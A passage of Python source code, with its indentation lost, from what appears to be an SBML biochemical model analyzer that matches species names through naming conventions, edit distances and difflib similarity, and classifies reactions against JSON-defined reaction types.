addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
flag = True
if flag:
composingElements.append(splitp)
return basicElements,composingElements
additionalHandling = []
#lexical handling
for particle in sorted(particles, key=len):
composingElements = []
basicElements = []
# can you break it down into small bites?
if '_' in particle:
splitparticle = particle.split('_')
#print '---',splitparticle
splitparticle = [x for x in splitparticle if x]
#print splitparticle
basicElements,composingElements = analyzeByParticle(splitparticle,species)
if basicElements == composingElements and basicElements:
closeMatches = get_close_matches(particle,species)
matches = [x for x in closeMatches if len(x) < len(particle) and len(x) >= 3]
for match in matches:
difference = difflib.ndiff(match,particle)
differenceList = tuple([x for x in difference if '+' in x])
if differenceList in self.namingConventions['patterns']:
logMess('INFO:LAE005', 'matching {0}={1}'.format(particle, [match]))
addToDependencyGraph(dependencyGraph,particle,[match])
if len(matches) > 0:
continue
elif particle not in composingElements and composingElements != [] and all([x in species for x in composingElements]):
addToDependencyGraph(dependencyGraph, particle, composingElements)
for element in composingElements:
if element not in dependencyGraph:
addToDependencyGraph(dependencyGraph, element, [])
if element not in particles:
additionalHandling.append(element)
continue
else:
for basicElement in basicElements:
if basicElement in particle and basicElement != particle:
fuzzyList = self.processAdHocNamingConventions(basicElement, particle, localSpeciesDict, False, species)
if self.testAgainstExistingConventions(fuzzyList[0][1], self.namingConventions['modificationList']):
addToDependencyGraph(dependencyGraph, particle, [basicElement])
logMess('INFO:LAE005', '{0} can be mapped to {1} through existing naming conventions'.format(particle, [basicElement]))
break
continue
# if bottom up doesn't work try a top down approach
for comparisonParticle in particles:
if particle == comparisonParticle:
continue
# try to map remaining orphaned molecules to each other based on simple, but known modifications
if comparisonParticle in particle:
fuzzyList = self.processAdHocNamingConventions(particle,comparisonParticle,localSpeciesDict, False, species)
if self.testAgainstExistingConventions(fuzzyList[0][1],self.namingConventions['modificationList']):
if particle in annotationDict and comparisonParticle in annotationDict:
baseSet = set([y for x in annotationDict[particle] for y in annotationDict[particle][x]])
modSet = set([y for x in annotationDict[comparisonParticle] for y in annotationDict[comparisonParticle][x]])
if len(baseSet.intersection(modSet)) == 0:
baseDB = set([x.split('/')[-2] for x in baseSet if 'identifiers.org' in x])
modDB = set([x.split('/')[-2] for x in modSet if 'identifiers.org' in x])
#we stil ahve to check that they both reference the same database
if len(baseDB.intersection(modDB)) > 0:
logMess('ERROR:ANN202', '{0}:{1}:can be mapped through naming conventions but the annotation information does not match'.format(particle, comparisonParticle))
continue
addToDependencyGraph(dependencyGraph,particle,[comparisonParticle])
logMess('INFO:LAE005', '{0} can be mapped to {1} through existing naming conventions'.format(particle, [comparisonParticle]))
break
else:
common_root = detectOntology.findLongestSubstring(particle, comparisonParticle)
# some arbitrary threshold of what makes a good minimum lenght for the common root
if len(common_root) > 0 and common_root not in originalDependencyGraph:
fuzzyList = self.processAdHocNamingConventions(common_root,comparisonParticle,localSpeciesDict, False, species)
fuzzyList2 = self.processAdHocNamingConventions(common_root,particle,localSpeciesDict, False, species)
particleMap = self.testAgainstExistingConventions(fuzzyList[0][1], self.namingConventions['modificationList'])
compParticleMap = fuzzyList2, self.testAgainstExistingConventions(fuzzyList2[0][1], self.namingConventions['modificationList'])
if particleMap and compParticleMap:
if particle in annotationDict and comparisonParticle in annotationDict:
baseSet = set([y for x in annotationDict[particle] for y in annotationDict[particle][x]])
modSet = set([y for x in annotationDict[comparisonParticle] for y in annotationDict[comparisonParticle][x]])
if len(baseSet.intersection(modSet)) == 0:
logMess('ERROR:ANN202', '{0}:{1}:can be mapped through naming conventions but the annotation information does not match'.format(particle,comparisonParticle))
break
addToDependencyGraph(dependencyGraph, particle, [common_root])
addToDependencyGraph(dependencyGraph, comparisonParticle, [common_root])
addToDependencyGraph(dependencyGraph, common_root, [])
logMess('INFO:LAE006', '{0}:{1}:can be mapped together through new common molecule {2} by existing naming conventions'.format(particle, comparisonParticle, common_root))
break
#if len(additionalHandling) > 0:
#print self.findClosestModification(set(additionalHandling),species)
return dependencyGraph,equivalenceTranslator
def loadConfigFiles(self,fileName):
'''
the reactionDefinition file must contain the definitions of the basic reaction types
we wnat to parse and what are the requirements of a given reaction type to be considered
as such
'''
reactionDefinition = ''
if fileName == '':
return []
with open(fileName,'r') as fp:
reactionDefinition = json.load(fp)
return reactionDefinition
def identifyReactions2(self,rule,reactionDefinition):
'''
This method goes through the list of common reactions listed in ruleDictionary
and tries to find how are they related according to the information in reactionDefinition
'''
result = []
for idx,element in enumerate(reactionDefinition['reactions']):
tmp1 = rule[0] if rule[0] not in ['0',['0']] else []
tmp2 = rule[1] if rule[1] not in ['0',['0']] else []
if(len(tmp1) == len(element[0]) and len(tmp2) == len(element[1])):
result.append(1)
# for (el1,el2) in (element[0],rule[0]):
# if element[0].count(el1) == element[]
else:
result.append(0)
return result
def species2Rules(self,rules):
'''
This method goes through the rule list and classifies species tuples in a dictionary
according to the reactions they appear in.
'''
ruleDictionary = {}
for idx,rule in enumerate(rules):
reaction2 = rule #list(parseReactions(rule))
totalElements = [item for sublist in reaction2 for item in sublist]
if tuple(totalElements) in ruleDictionary:
ruleDictionary[tuple(totalElements)].append(idx)
else:
ruleDictionary[tuple(totalElements)] = [idx]
return ruleDictionary
def checkCompliance(self,ruleCompliance,tupleCompliance,ruleBook):
'''
This method is mainly useful when a single reaction can be possibly classified
in different ways, but in the context of its tuple partners it can only be classified
as one
'''
ruleResult = np.zeros(len(ruleBook))
for validTupleIndex in np.nonzero(tupleCompliance):
for index in validTupleIndex:
for alternative in ruleBook[index]:
if 'r' in alternative and np.any([ruleCompliance[temp] for temp in alternative['r']]):
ruleResult[index] = 1
break
#check if just this is enough
if 'n' in alternative:
ruleResult[index] = 1
break
return ruleResult
def levenshtein(self,s1, s2):
l1 = len(s1)
l2 = len(s2)
matrix = [range(l1 + 1)] * (l2 + 1)
for zz in range(l2 + 1):
matrix[zz] = range(zz,zz + l1 + 1)
for zz in range(0,l2):
for sz in range(0,l1):
if s1[sz] == s2[zz]:
matrix[zz+1][sz+1] = min(matrix[zz+1][sz] + 1, matrix[zz][sz+1] + 1, matrix[zz][sz])
else:
matrix[zz+1][sz+1] = min(matrix[zz+1][sz] + 1, matrix[zz][sz+1] + 1, matrix[zz][sz] + 1)
return matrix[l2][l1]
def analyzeUserDefinedEquivalences(self,molecules,conventions):
equivalences = {}
smolecules = [x.strip('()') for x in molecules]
modifiedElement = {}
for convention in conventions:
baseMol = []
modMol = []
for molecule in smolecules:
if convention[0] in molecule and convention[1] not in molecule:
baseMol.append(molecule)
elif convention[1] in molecule:
modMol.append(molecule)
if convention[2] not in equivalences:
equivalences[convention[2]] = []
equivalences[convention[2]].append((convention[0],convention[1]))
if convention[0] not in modifiedElement:
modifiedElement[convention[0]] = []
modifiedElement[convention[0]].append((convention[0],convention[1]))
'''
for mol1 in baseMol:
for mol2 in modMol:
score = self.levenshtein(mol1,mol2)
if score == self.levenshtein(convention[0],convention[1]):
equivalences[convention[2]].append((mol1,mol2))
modifiedElement[convention[0]].append((mol1,mol2))
break
'''
return equivalences,modifiedElement
def processNamingConventions2(self, molecules, threshold=4, onlyUser=False):
# normal naming conventions
strippedMolecules = [x.strip('()') for x in molecules]
tmpTranslator = {}
translationKeys = []
conventionDict = {}
# FIXME: This line contains the single biggest execution bottleneck in the code
# we should be able to delete it
# user defined equivalence
if not onlyUser:
tmpTranslator, translationKeys, conventionDict = detectOntology.analyzeNamingConventions(strippedMolecules,
self.namingConventions, similarityThreshold=threshold)
# user defined naming convention
if self.userEquivalencesDict is None and hasattr(self, 'userEquivalences'):
self.userEquivalencesDict, self.modifiedElementDictionary = self.analyzeUserDefinedEquivalences(molecules, self.userEquivalences)
else:
if self.userEquivalencesDict is None:
self.userEquivalencesDict = {}
'''
for name in self.userEquivalencesDict:
equivalenceTranslator[name] = self.userEquivalencesDict[name]
'''
# add stuff to the main translator
for element in self.userEquivalencesDict:
if element not in tmpTranslator:
tmpTranslator[element] = []
tmpTranslator[element].extend(self.userEquivalencesDict[element])
return tmpTranslator, translationKeys, conventionDict
def processAdHocNamingConventions(self, reactant, product,
localSpeciesDict, compartmentChangeFlag, moleculeSet):
'''
1-1 string comparison. This method will attempt to detect if there's
a modifiation relatinship between string <reactant> and <product>
>>> sa = SBMLAnalyzer(None,'./config/reactionDefinitions.json','./config/namingConventions.json')
>>> sa.processAdHocNamingConventions('EGF_EGFR_2','EGF_EGFR_2_P', {}, False, ['EGF','EGFR', 'EGF_EGFR_2'])
[[[['EGF_EGFR_2'], ['EGF_EGFR_2_P']], '_p', ('+ _', '+ p')]]
>>> sa.processAdHocNamingConventions('A', 'A_P', {}, False,['A','A_P']) #changes neeed to be at least 3 characters long
[[[['A'], ['A_P']], None, None]]
>>> sa.processAdHocNamingConventions('Ras_GDP', 'Ras_GTP', {}, False,['Ras_GDP','Ras_GTP', 'Ras'])
[[[['Ras'], ['Ras_GDP']], '_gdp', ('+ _', '+ g', '+ d', '+ p')], [[['Ras'], ['Ras_GTP']], '_gtp', ('+ _', '+ g', '+ t', '+ p')]]
>>> sa.processAdHocNamingConventions('cRas_GDP', 'cRas_GTP', {}, False,['cRas_GDP','cRas_GTP'])
[[[['cRas'], ['cRas_GDP']], '_gdp', ('+ _', '+ g', '+ d', '+ p')], [[['cRas'], ['cRas_GTP']], '_gtp', ('+ _', '+ g', '+ t', '+ p')]]
'''
#strippedMolecules = [x.strip('()') for x in molecules]
molecules = [reactant, product] if len(reactant) < len(product) else [product, reactant]
similarityThreshold = 10
if reactant == product:
return [[[[reactant], [product]], None, None]]
namePairs, differenceList, _ = detectOntology.defineEditDistanceMatrix(molecules, similarityThreshold=similarityThreshold)
#print '+++',namePairs,differenceList
#print '---',detectOntology.defineEditDistanceMatrix2(molecules,similarityThreshold=similarityThreshold)
# FIXME:in here we need a smarter heuristic to detect actual modifications
# for now im just going with a simple heuristic that if the species name
# is long enough, and the changes from a to be are all about modification
longEnough = 3
if len(differenceList) > 0 and ((len(reactant) >= longEnough and len(reactant) >= len(differenceList[0])) or reactant in moleculeSet):
# one is strictly a subset of the other a,a_b
if len([x for x in differenceList[0] if '-' in x]) == 0:
return [[[[reactant], [product]], ''.join([x[-1] for x in differenceList[0]]), differenceList[0]]]
# string share a common subset but they contain mutually exclusive appendixes: a_b,a_c
else:
commonRoot = detectOntology.findLongestSubstring(reactant, product)
if len(commonRoot) > longEnough or commonRoot in moleculeSet:
#find if we can find a commonRoot from existing molecules
mostSimilarRealMolecules = get_close_matches(commonRoot, [x for x in moleculeSet if x not in [reactant, product]])
for commonMolecule in mostSimilarRealMolecules:
if commonMolecule in reactant and commonMolecule in product:
commonRoot = commonMolecule
logMess('DEBUG:LAE003', 'common root {0}={1}:{2}'.format(commonRoot, reactant, product))
#if commonMolecule == commonRoot.strip('_'):
# commonRoot= commonMolecule
# break
molecules = [commonRoot, reactant, product]
namePairs, differenceList, _ = detectOntology.defineEditDistanceMatrix([commonRoot, reactant], similarityThreshold=10)
namePairs2, differenceList2, _ = detectOntology.defineEditDistanceMatrix([commonRoot, product], similarityThreshold=10)
namePairs.extend(namePairs2)
#print namePairs, reactant, product
#XXX: this was just turning the heuristic off
#for element in namePairs:
# supposed modification is actually a pre-existing species. if that happens then refuse to proceeed
# if element[1] in moleculeSet:
# return [[[[reactant],[product]],None,None]]
differenceList.extend(differenceList2)
# obtain the name of the component from an anagram using the modification letters
validDifferences = [''.join([x[-1]
for x in difference])
for difference in differenceList if '-' not in [y[0]
for y in difference]]
validDifferences.sort()
# avoid trivial differences
if len(validDifferences) < 2 or any([x in moleculeSet for x in validDifferences]):
return [[[[reactant],[product]],None,None]]
# FIXME:here it'd be helpful to come up with a better heuristic
# for infered component names
# componentName = ''.join([x[0:max(1,int(math.ceil(len(x)/2.0)))] for x in validDifferences])
#for namePair,difference in zip(namePairs,differenceList):
# if len([x for x in difference if '-' in x]) == 0:
# tag = ''.join([x[-1] for x in difference])
# if [namePair[0],tag] not in localSpeciesDict[commonRoot][componentName]:
# localSpeciesDict[namePair[0]][componentName].append([namePair[0],tag,compartmentChangeFlag])
# localSpeciesDict[namePair[1]][componentName].append([namePair[0],tag,compartmentChangeFlag])
#namePairs,differenceList,_ = detectOntology.defineEditDistanceMatrix([commonRoot,product],
# similarityThreshold=similarityThreshold)
return [[[[namePairs[y][0]],[namePairs[y][1]]],''.join([x[-1] for x in differenceList[y]]),differenceList[y]] for y in range(len(differenceList))]
return [[[[reactant],[product]],None,None]]
def compareStrings(self,reactant,product,strippedMolecules):
if reactant in strippedMolecules:
if reactant in product:
return reactant,[reactant]
#pairedMolecules.append((reactant[idx],reactant[idx]))
#product.remove(reactant[idx])
#reactant.remove(reactant[idx])
else:
closeMatch = get_close_matches(reactant,product)
if len(closeMatch) == 1:
#pairedMolecules.append((reactant[idx],closeMatch[0]))
#product.remove(closeMatch[0])
#reactant.remove(reactant[idx])
return (reactant,closeMatch)
elif len(closeMatch) > 0:
s = difflib.SequenceMatcher()
s.set_seq1(reactant)
scoreDictionary = []
for match in closeMatch:
s.set_seq2(match)
scoreDictionary.append((s.ratio(),match))
scoreDictionary.sort(reverse=True)
return reactant,[closeMatch[0]]
else:
return None,[]
else:
if reactant not in product:
closeMatch = get_close_matches(reactant,product)
if len(closeMatch) == 1:
if closeMatch[0] in strippedMolecules:
return reactant,closeMatch
else:
closeMatchToBaseMolecules = get_close_matches(closeMatch[0],strippedMolecules)
if len(closeMatchToBaseMolecules) == 1:
return reactant,closeMatch
return None,closeMatch
#pairedMolecules.append((reactant[idx],closeMatch[0]))
#product.remove(closeMatch[0])
#reactant.remove(reactant[idx])
else:
return None,closeMatch
#print '****',reactant[idx],closeMatch,difflib.get_close_matches(reactant[idx],strippedMolecules)
else:
mcloseMatch = get_close_matches(reactant,strippedMolecules)
#for close in mcloseMatch:
# if close in [x for x in reaction[0]]:
# return None,[close]
return None,[reactant]
def growString(self, reactant, product, rp, pp, idx, strippedMolecules,continuityFlag):
'''
currently this is the slowest method in the system because of all those calls to difflib
'''
idx2 = 2
treactant = [rp]
tproduct = pp
pidx = product.index(pp[0])
#print reactant,rself.breakByActionableUnit([reactant,product],strippedMolecules)
while idx + idx2 <= len(reactant):
treactant2 = reactant[idx:min(len(reactant), idx + idx2)]
#if treactant2 != tproduct2:
if treactant2[-1] in strippedMolecules and continuityFlag:
break
else:
if len(reactant) > idx + idx2:
tailDifferences = get_close_matches(treactant2[-1], strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(treactant2), x) for x in tailDifferences])
hdr = max([0] + [sequenceMatcher('_'.join(reactant[idx + idx2 - 1:idx + idx2 + 1]), x) for x in tailDifferences])
if tdr > hdr and tdr > 0.8:
treactant = treactant2
else:
tailDifferences = get_close_matches('_'.join(treactant2), strippedMolecules)
headDifferences = get_close_matches('_'.join(reactant[idx + idx2 - 1:idx + idx2 + 1]), strippedMolecules)
if len(tailDifferences) == 0:
break
elif len(headDifferences) == 0:
treactant = treactant2
break
elif len(reactant) == idx + idx2:
tailDifferences = get_close_matches('_'.join(treactant2), strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(treactant2), x) for x in tailDifferences])
if tdr > 0.8:
treactant = treactant2
else:
break
else:
break
else:
treactant = treactant2
break
idx2 += 1
idx2 = 2
while pidx + idx2 <= len(product):
tproduct2 = product[pidx:min(len(product), pidx + idx2)]
if tproduct2[-1] in strippedMolecules and continuityFlag:
break
else:
if len(product) > pidx + idx2:
tailDifferences = get_close_matches(tproduct2[-1], strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(tproduct2), x) for x in tailDifferences])
hdr = max([0] + [sequenceMatcher('_'.join(product[pidx + idx2 - 1:pidx + idx2 + 1]), x) for x in tailDifferences])
if tdr > hdr and tdr > 0.8:
tproduct = tproduct2
else:
tailDifferences = get_close_matches('_'.join(tproduct2), strippedMolecules, cutoff=0.8)
headDifferences = get_close_matches('_'.join(product[pidx + idx2 - 1:pidx + idx2 + 1]), strippedMolecules, cutoff=0.8)
if len(tailDifferences) == 0:
break
elif len(headDifferences) == 0 or '_'.join(tproduct2) in tailDifferences:
tproduct = tproduct2
elif len(product) == pidx + idx2:
tailDifferences = get_close_matches('_'.join(tproduct2), strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(tproduct2), x) for x in tailDifferences])
if tdr > 0.8:
tproduct = tproduct2
else:
break
else:
break
else:
tproduct = tproduct2
break
#if '_'.join(tproduct2) in strippedMolecules and '_'.join(treactant2) in strippedMolecules:
# tproduct = tproduct2
# treactant = treactant2
#else:
idx2 += 1
return treactant, tproduct
def approximateMatching2(self, reactantString, productString, strippedMolecules, differenceParameter):
"""
The meat of the naming convention matching between reactant and product is done here
tl;dr naming conventions are hard
"""
#reactantString = [x.split('_') for x in reaction[0]]
#reactantString = [[y for y in x if y!=''] for x in reactantString]
#productString = [x.split('_') for x in reaction[1]]
#productString = [[y for y in x if y!=''] for x in productString]
pairedMolecules = [[] for _ in range(len(productString))]
pairedMolecules2 = [[] for _ in range(len(reactantString))]
for stoch, reactant in enumerate(reactantString):
idx = -1
while idx + 1 < len(reactant):
idx += 1
for stoch2, product in enumerate(productString):
#print idx2,product in enumerate(element3):
rp, pp = self.compareStrings(reactant[idx], product, strippedMolecules)
if rp and rp != pp[0]:
pairedMolecules[stoch2].append((rp, pp[0]))
pairedMolecules2[stoch].append((pp[0], rp))
product.remove(pp[0])
reactant.remove(rp)
#product.remove(pp)
#reactant.remove(rp)
idx = -1
break
elif rp:
treactant, tproduct = self.growString(reactant, product,
rp, pp, idx, strippedMolecules,continuityFlag=True)
if '_'.join(treactant) in strippedMolecules:
finalReactant = '_'.join(treactant)
else:
reactantMatches = get_close_matches('_'.join(treactant), strippedMolecules)
if len(reactantMatches) > 0:
reactantScore = [sequenceMatcher(''.join(treactant), x.replace('_','')) for x in reactantMatches]
finalReactant = reactantMatches[reactantScore.index(max(reactantScore))]
else:
finalReactant = '_'.join(treactant)
if '_'.join(tproduct) in strippedMolecules:
finalProduct = '_'.join(tproduct)
else:
productMatches = get_close_matches('_'.join(tproduct), strippedMolecules)
if len(productMatches) > 0:
productScore = [sequenceMatcher(''.join(tproduct), x.replace('_', '')) for x in productMatches]
finalProduct = productMatches[productScore.index(max(productScore))]
else:
finalProduct = '_'.join(tproduct)
pairedMolecules[stoch2].append((finalReactant, finalProduct))
pairedMolecules2[stoch].append((finalProduct, finalReactant))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
else:
flag = False
if pp not in [[], None]:
#if reactant[idx] == pp[0]:
treactant, tproduct = self.growString(reactant, product,
reactant[idx], pp, idx, strippedMolecules,continuityFlag=False)
#FIXME: this comparison is pretty nonsensical. treactant and tproduct are not
#guaranteed to be in teh right order. why are we comparing them both at the same time
if (len(treactant) > 1 and '_'.join(treactant) in strippedMolecules) or (len(tproduct)>1 and '_'.join(tproduct) in strippedMolecules):
pairedMolecules[stoch2].append(('_'.join(treactant), '_'.join(tproduct)))
pairedMolecules2[stoch].append(('_'.join(tproduct), '_'.join(treactant)))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
else:
rclose = get_close_matches('_'.join(treactant),strippedMolecules)
pclose = get_close_matches('_'.join(tproduct),strippedMolecules)
rclose2 = [x.split('_') for x in rclose]
rclose2 = ['_'.join([y for y in x if y != '']) for x in rclose2]
pclose2 = [x.split('_') for x in pclose]
pclose2 = ['_'.join([y for y in x if y != '']) for x in pclose2]
trueReactant = None
trueProduct = None
try:
trueReactant = rclose[rclose2.index('_'.join(treactant))]
trueProduct = pclose[pclose2.index('_'.join(tproduct))]
except:
pass
if trueReactant and trueProduct:
pairedMolecules[stoch2].append((trueReactant,trueProduct))
pairedMolecules2[stoch].append((trueProduct,trueReactant))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
if sum(len(x) for x in reactantString+productString)> 0 and self.conservationOfMass:
return None,None
else:
return pairedMolecules,pairedMolecules2
def approximateMatching(self,ruleList,differenceParameter=[]):
def curateString(element,differences,symbolList = ['#','&',';','@','!','?'],equivalenceDict={}):
'''
remove compound differencese (>2 characters) and instead represent them with symbols
returns transformed string,an equivalence dictionary and unused symbols
'''
tmp = element
for difference in differences:
if difference in element:
if difference.startswith('_'):
if difference not in equivalenceDict:
symbol = symbolList.pop()
equivalenceDict[difference] = symbol
else:
symbol = equivalenceDict[difference]
tmp = re.sub(r'{0}(_|$)'.format(difference),r'{0}\1'.format(symbol),tmp)
elif difference.endswith('_'):
if difference not in equivalenceDict:
symbol = symbolList.pop()
equivalenceDict[difference] = symbol
else:
symbol = equivalenceDict[difference]
tmp = re.sub(r'(_|^){0}'.format(difference),r'{0}\1'.format(symbol),tmp)
return tmp,symbolList,equivalenceDict
'''
given a transformation of the kind a+ b -> ~a_~b, where ~a and ~b are some
slightly modified version of a and b, this function will return a list of
lexical changes that a and b must undergo to become ~a and ~b.
'''
flag = True
if len(ruleList[1]) == 1 and ruleList[1] != '0':
differences = deepcopy(differenceParameter)
tmpRuleList = deepcopy(ruleList)
while flag:
flag = False
sym = ['#','&',';','@','!','?']
dic = {}
for idx,_ in enumerate(tmpRuleList[0]):
tmpRuleList[0][idx],sym,dic = curateString(ruleList[0][idx],differences,sym,dic)
tmpRuleList[1][0],sym,dic = curateString(ruleList[1][0],differences,sym,dic)
permutations = [x for x in itertools.permutations(ruleList[0])]
tpermutations = [x for x in itertools.permutations(tmpRuleList[0])]
score = [difflib.SequenceMatcher(None,'_'.join(x),ruleList[1][0]).ratio() \
for x in permutations]
maxindex = score.index(max(score))
ruleList[0] = list(permutations[maxindex])
tmpRuleList[0] = list(tpermutations[maxindex])
sym = [dic[x] for x in dic]
sym.extend(differences)
sym = [x for x in sym if '_' not in x]
simplifiedDifference = difflib.SequenceMatcher(lambda x: x in sym,'-'.join(tmpRuleList[0]),tmpRuleList[1][0])
matches = simplifiedDifference.get_matching_blocks()
if len(matches) != len(ruleList[0]) + 1:
return [[],[]],[[],[]]
productPartitions = []
for idx,match in enumerate(matches):
if matches[idx][2] != 0:
productPartitions.append(tmpRuleList[1][0][
matches[idx][1]:matches[idx][1]+matches[idx][2]])
reactantPartitions = tmpRuleList[0]
#Don't count trailing underscores as part of the species name
for idx,_ in enumerate(reactantPartitions):
reactantPartitions[idx] = reactantPartitions[idx].strip('_')
for idx,_ in enumerate(productPartitions):
productPartitions[idx] = productPartitions[idx].strip('_')
#greedymatching
acc=0
#FIXME:its not properly copying all the string
for idx in range(0,len(matches)-1):
while matches[idx][2]+ acc < len(tmpRuleList[1][0]) \
and tmpRuleList[1][0][matches[idx][2]+ acc] in sym:
productPartitions[idx] += tmpRuleList[1][0][matches[idx][2] + acc]
acc += 1
#idx = 0
#while(tmpString[matches[0][2]+ idx] in sym):
# reactantfirstHalf += tmpString[matches[0][2] + idx]
# idx += 1
for element in dic:
for idx in range(len(productPartitions)):
productPartitions[idx] = productPartitions[idx].replace(dic[element],element)
reactantPartitions[idx] = reactantPartitions[idx].replace(dic[element],element)
zippedPartitions = zip(reactantPartitions,productPartitions)
zippedPartitions = [sorted(x,key=len) for x in zippedPartitions]
bdifferences = [[z for z in y if '+ ' in z or '- ' in z] for y in \
[difflib.ndiff(*x) for x in zippedPartitions]]
processedDifferences = [''.join([y.strip('+ ') for y in x]) for x in bdifferences]
for idx,processedDifference in enumerate(processedDifferences):
if processedDifference not in differences and \
'- ' not in processedDifference and bdifferences[idx] != []:
flag = True
differences.append(processedDifference)
else:
#TODO: dea with reactions of the kindd a+b -> c + d
return [[],[]],[[],[]]
return bdifferences,zippedPartitions
def getReactionClassification(self,reactionDefinition,rules,equivalenceTranslator,
indirectEquivalenceTranslator,
translationKeys=[]):
'''
*reactionDefinition* is a list of conditions that must be met for a reaction
to be classified a certain way
*rules* is the list of reactions
*equivalenceTranslator* is a dictinary containing all complexes that have been
determined to be the same through naming conventions
This method will go through the list of rules and the list of rule definitions
and tell us which rules it can classify according to the rule definitions list
provided
'''
ruleDictionary = self.species2Rules(rules)
#determines a reaction's reactionStructure aka stoichoimetry
ruleComplianceMatrix = np.zeros((len(rules),len(reactionDefinition['reactions'])))
for (idx,rule) in enumerate(rules):
reaction2 = rule #list(parseReactions(rule))
ruleComplianceMatrix[idx] = self.identifyReactions2(reaction2,reactionDefinition)
#initialize the tupleComplianceMatrix array with the same keys as ruleDictionary
#the tuple complianceMatrix is basically there to make sure we evaluate
#bidirectional reactions as one reaction
tupleComplianceMatrix = {key:np.zeros((len(reactionDefinition['reactions']))) for key in ruleDictionary}
#check which reaction conditions each tuple satisfies
for element in ruleDictionary:
for rule in ruleDictionary[element]:
tupleComplianceMatrix[element] += ruleComplianceMatrix[rule]
#now we will check for the nameConventionMatrix (same thing as before but for naming conventions)
tupleNameComplianceMatrix = {key:{key2:0 for key2 in equivalenceTranslator} \
for key in ruleDictionary}
for rule in ruleDictionary:
for namingConvention in equivalenceTranslator:
for equivalence in equivalenceTranslator[namingConvention]:
if all(element in rule for element in equivalence):
tupleNameComplianceMatrix[rule][namingConvention] +=1
break
for equivalence in indirectEquivalenceTranslator[namingConvention]:
if all(element in rule for element in equivalence[0]):
tupleNameComplianceMatrix[rule][namingConvention] +=1
break
#we can have more than one
#elif appro
#check if the reaction conditions each tuple satisfies are enough to get classified
#as an specific named reaction type
tupleDefinitionMatrix = {key:np.zeros((len(reactionDefinition['definitions']))) for key in ruleDictionary}
for key,element in tupleComplianceMatrix.items():
for idx,member in enumerate(reactionDefinition['definitions']):
for alternative in member:
if 'r' in alternative:
tupleDefinitionMatrix[key][idx] += np.all([element[reaction] for reaction in alternative[u'r']])
if 'n' in alternative and reactionDefinition['reactionsNames'][idx] in equivalenceTranslator:
tupleDefinitionMatrix[key][idx] += np.all([tupleNameComplianceMatrix[key][reactionDefinition['reactionsNames'][idx]]])
#cotains which rules are equal to reactions defined in reactionDefinitions['definitions']
#use the per tuple classification to obtain a per reaction classification
ruleDefinitionMatrix = np.zeros((len(rules),len(reactionDefinition['definitions'])))
for key,element in ruleDictionary.items():
for rule in element:
ruleDefinitionMatrix[rule] = self.checkCompliance(ruleComplianceMatrix[rule],
tupleDefinitionMatrix[key],reactionDefinition['definitions'])
#use reactionDefinitions reactionNames field to actually tell us what reaction
#type each reaction is
results = []
for idx,element in enumerate(ruleDefinitionMatrix):
nonZero = np.nonzero(element)[0]
if(len(nonZero) == 0):
results.append('None')
#todo: need to do something if it matches more than one reaction
else:
classifications = [reactionDefinition['reactionsNames'][x] for x in nonZero]
#FIXME: we should be able to support more than one transformation
results.append(classifications[0])
return results
def setConfigurationFile(self,configurationFile):
self.configurationFile = configurationFile
def getReactionProperties(self):
'''
if we are using a naming convention definition in the json file
this method will return the component and state names that this
reaction uses
'''
#TODO: once we transition completely to a naming convention delete
#this ----
reactionTypeProperties = {}
reactionDefinition = self.loadConfigFiles(self.configurationFile)
if self.speciesEquivalences != None:
self.userEquivalences = self.loadConfigFiles(self.speciesEquivalences)['reactionDefinition']
for reactionType,properties in zip(reactionDefinition['reactionsNames'],reactionDefinition['definitions']):
#if its a reaction defined by its naming convention
#xxxxxxxxxxxxxxxxxxx
for alternative in properties:
if 'n' in alternative.keys():
try:
site = reactionDefinition['reactionSite'][alternative['rsi']]
state = reactionDefinition['reactionState'][alternative['rst']]
except:
site = reactionType
state = reactionType[0]
reactionTypeProperties[reactionType] = [site,state]
#TODO: end of delete
reactionDefinition = self.namingConventions
for idx,reactionType in enumerate(reactionDefinition['modificationList']):
site = reactionDefinition['reactionSite'][reactionDefinition['definitions'][idx]['rsi']]
state = reactionDefinition['reactionState'][reactionDefinition['definitions'][idx]['rst']]
reactionTypeProperties[reactionType] = [site,state]
return reactionTypeProperties
def processFuzzyReaction(self,reaction,translationKeys,conventionDict,indirectEquivalenceTranslator):
differences,pairedChemicals= self.approximateMatching(reaction,
translationKeys)
#matching,matching2 = self.approximateMatching2(reaction,strippedMolecules,
# translationKeys)
d1,d2 = differences[0],differences[1]
firstMatch,secondMatch = pairedChemicals[0],pairedChemicals[1]
matches = [firstMatch,secondMatch]
for index,element in enumerate([d1,d2]):
idx1=0
idx2 = 1
while idx2 <= len(element):
if (element[idx1],) in conventionDict.keys():
pattern = conventionDict[(element[idx1],)]
indirectEquivalenceTranslator[pattern].append([[reaction[0][index],reaction[1][0]],reaction[0],matches[index],reaction[1]])
elif (element[idx1].replace('-','+'),) in conventionDict.keys():
matches[index].reverse()
transformedPattern = conventionDict[(element[idx1].replace('-','+'),) ]
indirectEquivalenceTranslator[transformedPattern].append([[reaction[1][0],reaction[0][index]],reaction[0],matches[index],reaction[1]])
elif idx2 < len(element):
if tuple([element[idx1],element[idx2]]) in conventionDict.keys():
pattern = conventionDict[tuple([element[idx1],element[idx2]])]
indirectEquivalenceTranslator[pattern].append([[reaction[0][index],reaction[1][0]],reaction[0],matches[index],reaction[1]])
idx1 += 1
idx2 += 1
elif '-' in element[idx1] and '-' in element[idx2]:
if tuple([element[idx1].replace('-','+'),element[idx2].replace('-','+')]) in conventionDict.keys():
matches[index].reverse()
transformedPattern = conventionDict[tuple([element[idx1].replace('-','+'),element[idx2].replace('-','+')])]
indirectEquivalenceTranslator[transformedPattern].append([[reaction[1][0],reaction[0][index]],reaction[0],matches[index],reaction[1]])
idx1 += 1
idx2 += 1
idx1+=1
idx2+=1
def removeExactMatches(self, reactantList, productList):
"""
goes through the list of lists reactantList and productList and removes the intersection
"""
reactantFlat = Counter([y for x in reactantList for y in x])
productFlat = Counter([y for x in productList for y in x])
intersection = reactantFlat & productFlat
intersection2 = deepcopy(intersection)
newReactant = []
newProduct = []
